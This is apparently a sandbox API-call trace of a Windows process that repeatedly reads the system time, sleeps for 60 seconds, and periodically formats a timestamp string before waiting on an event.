	[0222.862] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cfa8c20, dwHighDateTime=0x1d50a6a)) 
	[0222.862] Sleep (dwMilliseconds=0xea60) 
	[0222.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cfced80, dwHighDateTime=0x1d50a6a)) 
	[0222.878] Sleep (dwMilliseconds=0xea60) 
	[0222.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cff4ee0, dwHighDateTime=0x1d50a6a)) 
	[0222.905] Sleep (dwMilliseconds=0xea60) 
	[0222.909] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d01b040, dwHighDateTime=0x1d50a6a)) 
	[0222.909] Sleep (dwMilliseconds=0xea60) 
	[0222.924] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d0411a0, dwHighDateTime=0x1d50a6a)) 
	[0222.924] Sleep (dwMilliseconds=0xea60) 
	[0222.940] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d067300, dwHighDateTime=0x1d50a6a)) 
	[0222.940] Sleep (dwMilliseconds=0xea60) 
	[0222.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d08d460, dwHighDateTime=0x1d50a6a)) 
	[0222.956] Sleep (dwMilliseconds=0xea60) 
	[0222.972] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d0b35c0, dwHighDateTime=0x1d50a6a)) 
	[0222.972] Sleep (dwMilliseconds=0xea60) 
	[0222.987] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d0d9720, dwHighDateTime=0x1d50a6a)) 
	[0222.988] Sleep (dwMilliseconds=0xea60) 
	[0223.003] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d0ff880, dwHighDateTime=0x1d50a6a)) 
	[0223.003] Sleep (dwMilliseconds=0xea60) 
	[0223.019] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d1259e0, dwHighDateTime=0x1d50a6a)) 
	[0223.019] Sleep (dwMilliseconds=0xea60) 
	[0223.034] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d14bb40, dwHighDateTime=0x1d50a6a)) 
	[0223.034] Sleep (dwMilliseconds=0xea60) 
	[0223.050] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d171ca0, dwHighDateTime=0x1d50a6a)) 
	[0223.050] Sleep (dwMilliseconds=0xea60) 
	[0223.065] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d197e00, dwHighDateTime=0x1d50a6a)) 
	[0223.065] Sleep (dwMilliseconds=0xea60) 
	[0223.081] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d1bdf60, dwHighDateTime=0x1d50a6a)) 
	[0223.081] Sleep (dwMilliseconds=0xea60) 
	[0223.096] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d1e40c0, dwHighDateTime=0x1d50a6a)) 
	[0223.096] Sleep (dwMilliseconds=0xea60) 
	[0223.112] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d20a220, dwHighDateTime=0x1d50a6a)) 
	[0223.112] Sleep (dwMilliseconds=0xea60) 
	[0223.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d230380, dwHighDateTime=0x1d50a6a)) 
	[0223.137] Sleep (dwMilliseconds=0xea60) 
	[0223.144] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d2564e0, dwHighDateTime=0x1d50a6a)) 
	[0223.144] Sleep (dwMilliseconds=0xea60) 
	[0223.159] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d27c640, dwHighDateTime=0x1d50a6a)) 
	[0223.159] Sleep (dwMilliseconds=0xea60) 
	[0223.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d2a27a0, dwHighDateTime=0x1d50a6a)) 
	[0223.174] Sleep (dwMilliseconds=0xea60) 
	[0223.190] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d2c8900, dwHighDateTime=0x1d50a6a)) 
	[0223.190] Sleep (dwMilliseconds=0xea60) 
	[0223.206] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d2eea60, dwHighDateTime=0x1d50a6a)) 
	[0223.206] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557853459\r\n") returned 12
	[0223.206] ResetEvent (hEvent=0xc) returned 1
	[0223.206] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0223.208] Sleep (dwMilliseconds=0xea60) 
	[0223.221] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d314bc0, dwHighDateTime=0x1d50a6a)) 
	[0223.221] Sleep (dwMilliseconds=0xea60) 
	[0223.237] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d33ad20, dwHighDateTime=0x1d50a6a)) 
	[0223.237] Sleep (dwMilliseconds=0xea60) 
	[0223.252] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d360e80, dwHighDateTime=0x1d50a6a)) 
	[0223.252] Sleep (dwMilliseconds=0xea60) 
	[0223.268] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d386fe0, dwHighDateTime=0x1d50a6a)) 
	[0223.268] Sleep (dwMilliseconds=0xea60) 
	[0223.284] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d3ad140, dwHighDateTime=0x1d50a6a)) 
	[0223.284] Sleep (dwMilliseconds=0xea60) 
	[0223.300] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d3d32a0, dwHighDateTime=0x1d50a6a)) 
	[0223.300] Sleep (dwMilliseconds=0xea60) 
	[0223.315] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d3f9400, dwHighDateTime=0x1d50a6a)) 
	[0223.315] Sleep (dwMilliseconds=0xea60) 
	[0223.330] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d41f560, dwHighDateTime=0x1d50a6a)) 
	[0223.330] Sleep (dwMilliseconds=0xea60) 
	[0223.346] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d4456c0, dwHighDateTime=0x1d50a6a)) 
	[0223.346] Sleep (dwMilliseconds=0xea60) 
	[0223.361] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d46b820, dwHighDateTime=0x1d50a6a)) 
	[0223.361] Sleep (dwMilliseconds=0xea60) 
	[0223.378] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d491980, dwHighDateTime=0x1d50a6a)) 
	[0223.378] Sleep (dwMilliseconds=0xea60) 
	[0223.393] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d4b7ae0, dwHighDateTime=0x1d50a6a)) 
	[0223.393] Sleep (dwMilliseconds=0xea60) 
	[0223.411] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d4ddc40, dwHighDateTime=0x1d50a6a)) 
	[0223.411] Sleep (dwMilliseconds=0xea60) 
	[0223.424] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d503da0, dwHighDateTime=0x1d50a6a)) 
	[0223.424] Sleep (dwMilliseconds=0xea60) 
	[0223.452] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d529f00, dwHighDateTime=0x1d50a6a)) 
	[0223.452] Sleep (dwMilliseconds=0xea60) 
	[0223.455] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d550060, dwHighDateTime=0x1d50a6a)) 
	[0223.455] Sleep (dwMilliseconds=0xea60) 
	[0223.471] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d5761c0, dwHighDateTime=0x1d50a6a)) 
	[0223.471] Sleep (dwMilliseconds=0xea60) 
	[0223.486] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d59c320, dwHighDateTime=0x1d50a6a)) 
	[0223.486] Sleep (dwMilliseconds=0xea60) 
	[0223.502] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d5c2480, dwHighDateTime=0x1d50a6a)) 
	[0223.502] Sleep (dwMilliseconds=0xea60) 
	[0223.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d5e85e0, dwHighDateTime=0x1d50a6a)) 
	[0223.518] Sleep (dwMilliseconds=0xea60) 
	[0223.534] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d60e740, dwHighDateTime=0x1d50a6a)) 
	[0223.534] Sleep (dwMilliseconds=0xea60) 
	[0223.548] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d6348a0, dwHighDateTime=0x1d50a6a)) 
	[0223.549] Sleep (dwMilliseconds=0xea60) 
	[0223.564] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d65aa00, dwHighDateTime=0x1d50a6a)) 
	[0223.564] Sleep (dwMilliseconds=0xea60) 
	[0223.580] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d680b60, dwHighDateTime=0x1d50a6a)) 
	[0223.580] Sleep (dwMilliseconds=0xea60) 
	[0223.598] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d6a6cc0, dwHighDateTime=0x1d50a6a)) 
	[0223.598] Sleep (dwMilliseconds=0xea60) 
	[0223.611] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d6cce20, dwHighDateTime=0x1d50a6a)) 
	[0223.611] Sleep (dwMilliseconds=0xea60) 
	[0223.627] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d6f2f80, dwHighDateTime=0x1d50a6a)) 
	[0223.627] Sleep (dwMilliseconds=0xea60) 
	[0223.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d7190e0, dwHighDateTime=0x1d50a6a)) 
	[0223.646] Sleep (dwMilliseconds=0xea60) 
	[0223.658] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d73f240, dwHighDateTime=0x1d50a6a)) 
	[0223.658] Sleep (dwMilliseconds=0xea60) 
	[0223.673] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d7653a0, dwHighDateTime=0x1d50a6a)) 
	[0223.673] Sleep (dwMilliseconds=0xea60) 
	[0223.689] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d78b500, dwHighDateTime=0x1d50a6a)) 
	[0223.689] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557855319\r\n") returned 12
	[0223.689] ResetEvent (hEvent=0xc) returned 1
	[0223.689] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0223.692] Sleep (dwMilliseconds=0xea60) 
	[0223.705] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d7b1660, dwHighDateTime=0x1d50a6a)) 
	[0223.705] Sleep (dwMilliseconds=0xea60) 
	[0223.720] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d7d77c0, dwHighDateTime=0x1d50a6a)) 
	[0223.720] Sleep (dwMilliseconds=0xea60) 
	[0223.736] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d7fd920, dwHighDateTime=0x1d50a6a)) 
	[0223.736] Sleep (dwMilliseconds=0xea60) 
	[0223.752] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d823a80, dwHighDateTime=0x1d50a6a)) 
	[0223.752] Sleep (dwMilliseconds=0xea60) 
	[0223.767] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d849be0, dwHighDateTime=0x1d50a6a)) 
	[0223.767] Sleep (dwMilliseconds=0xea60) 
	[0223.782] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d86fd40, dwHighDateTime=0x1d50a6a)) 
	[0223.782] Sleep (dwMilliseconds=0xea60) 
	[0223.798] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d895ea0, dwHighDateTime=0x1d50a6a)) 
	[0223.798] Sleep (dwMilliseconds=0xea60) 
	[0223.814] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d8bc000, dwHighDateTime=0x1d50a6a)) 
	[0223.814] Sleep (dwMilliseconds=0xea60) 
	[0223.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d8e2160, dwHighDateTime=0x1d50a6a)) 
	[0223.830] Sleep (dwMilliseconds=0xea60) 
	[0223.845] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d9082c0, dwHighDateTime=0x1d50a6a)) 
	[0223.845] Sleep (dwMilliseconds=0xea60) 
	[0223.868] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d92e420, dwHighDateTime=0x1d50a6a)) 
	[0223.868] Sleep (dwMilliseconds=0xea60) 
	[0223.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d954580, dwHighDateTime=0x1d50a6a)) 
	[0223.876] Sleep (dwMilliseconds=0xea60) 
	[0223.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d97a6e0, dwHighDateTime=0x1d50a6a)) 
	[0223.892] Sleep (dwMilliseconds=0xea60) 
	[0223.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d9a0840, dwHighDateTime=0x1d50a6a)) 
	[0223.907] Sleep (dwMilliseconds=0xea60) 
	[0223.924] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d9c69a0, dwHighDateTime=0x1d50a6a)) 
	[0223.924] Sleep (dwMilliseconds=0xea60) 
	[0223.947] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6d9ecb00, dwHighDateTime=0x1d50a6a)) 
	[0223.947] Sleep (dwMilliseconds=0xea60) 
	[0223.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6da12c60, dwHighDateTime=0x1d50a6a)) 
	[0223.954] Sleep (dwMilliseconds=0xea60) 
	[0223.970] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6da38dc0, dwHighDateTime=0x1d50a6a)) 
	[0223.970] Sleep (dwMilliseconds=0xea60) 
	[0223.985] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6da5ef20, dwHighDateTime=0x1d50a6a)) 
	[0223.985] Sleep (dwMilliseconds=0xea60) 
	[0224.001] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6da85080, dwHighDateTime=0x1d50a6a)) 
	[0224.001] Sleep (dwMilliseconds=0xea60) 
	[0224.017] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6daab1e0, dwHighDateTime=0x1d50a6a)) 
	[0224.017] Sleep (dwMilliseconds=0xea60) 
	[0224.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dad1340, dwHighDateTime=0x1d50a6a)) 
	[0224.032] Sleep (dwMilliseconds=0xea60) 
	[0224.048] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6daf74a0, dwHighDateTime=0x1d50a6a)) 
	[0224.048] Sleep (dwMilliseconds=0xea60) 
	[0224.063] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6db1d600, dwHighDateTime=0x1d50a6a)) 
	[0224.063] Sleep (dwMilliseconds=0xea60) 
	[0224.079] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6db43760, dwHighDateTime=0x1d50a6a)) 
	[0224.080] Sleep (dwMilliseconds=0xea60) 
	[0224.095] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6db698c0, dwHighDateTime=0x1d50a6a)) 
	[0224.095] Sleep (dwMilliseconds=0xea60) 
	[0224.110] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6db8fa20, dwHighDateTime=0x1d50a6a)) 
	[0224.110] Sleep (dwMilliseconds=0xea60) 
	[0224.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dbb5b80, dwHighDateTime=0x1d50a6a)) 
	[0224.126] Sleep (dwMilliseconds=0xea60) 
	[0224.172] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dc01e40, dwHighDateTime=0x1d50a6a)) 
	[0224.172] Sleep (dwMilliseconds=0xea60) 
	[0224.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dc27fa0, dwHighDateTime=0x1d50a6a)) 
	[0224.174] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557857120\r\n") returned 12
	[0224.174] ResetEvent (hEvent=0xc) returned 1
	[0224.174] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0224.175] Sleep (dwMilliseconds=0xea60) 
	[0224.189] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dc4e100, dwHighDateTime=0x1d50a6a)) 
	[0224.189] Sleep (dwMilliseconds=0xea60) 
	[0224.204] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dc74260, dwHighDateTime=0x1d50a6a)) 
	[0224.204] Sleep (dwMilliseconds=0xea60) 
	[0224.219] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dc9a3c0, dwHighDateTime=0x1d50a6a)) 
	[0224.219] Sleep (dwMilliseconds=0xea60) 
	[0224.235] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dcc0520, dwHighDateTime=0x1d50a6a)) 
	[0224.235] Sleep (dwMilliseconds=0xea60) 
	[0224.250] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dce6680, dwHighDateTime=0x1d50a6a)) 
	[0224.250] Sleep (dwMilliseconds=0xea60) 
	[0224.266] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dd0c7e0, dwHighDateTime=0x1d50a6a)) 
	[0224.266] Sleep (dwMilliseconds=0xea60) 
	[0224.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dd32940, dwHighDateTime=0x1d50a6a)) 
	[0224.282] Sleep (dwMilliseconds=0xea60) 
	[0224.298] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dd58aa0, dwHighDateTime=0x1d50a6a)) 
	[0224.298] Sleep (dwMilliseconds=0xea60) 
	[0224.314] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dd7ec00, dwHighDateTime=0x1d50a6a)) 
	[0224.314] Sleep (dwMilliseconds=0xea60) 
	[0224.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dda4d60, dwHighDateTime=0x1d50a6a)) 
	[0224.329] Sleep (dwMilliseconds=0xea60) 
	[0224.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ddcaec0, dwHighDateTime=0x1d50a6a)) 
	[0224.344] Sleep (dwMilliseconds=0xea60) 
	[0224.360] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ddf1020, dwHighDateTime=0x1d50a6a)) 
	[0224.360] Sleep (dwMilliseconds=0xea60) 
	[0224.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6de17180, dwHighDateTime=0x1d50a6a)) 
	[0224.376] Sleep (dwMilliseconds=0xea60) 
	[0224.391] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6de3d2e0, dwHighDateTime=0x1d50a6a)) 
	[0224.391] Sleep (dwMilliseconds=0xea60) 
	[0224.407] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6de63440, dwHighDateTime=0x1d50a6a)) 
	[0224.407] Sleep (dwMilliseconds=0xea60) 
	[0224.423] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6de895a0, dwHighDateTime=0x1d50a6a)) 
	[0224.423] Sleep (dwMilliseconds=0xea60) 
	[0224.456] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ded5860, dwHighDateTime=0x1d50a6a)) 
	[0224.456] Sleep (dwMilliseconds=0xea60) 
	[0224.469] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6defb9c0, dwHighDateTime=0x1d50a6a)) 
	[0224.469] Sleep (dwMilliseconds=0xea60) 
	[0224.485] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6df21b20, dwHighDateTime=0x1d50a6a)) 
	[0224.485] Sleep (dwMilliseconds=0xea60) 
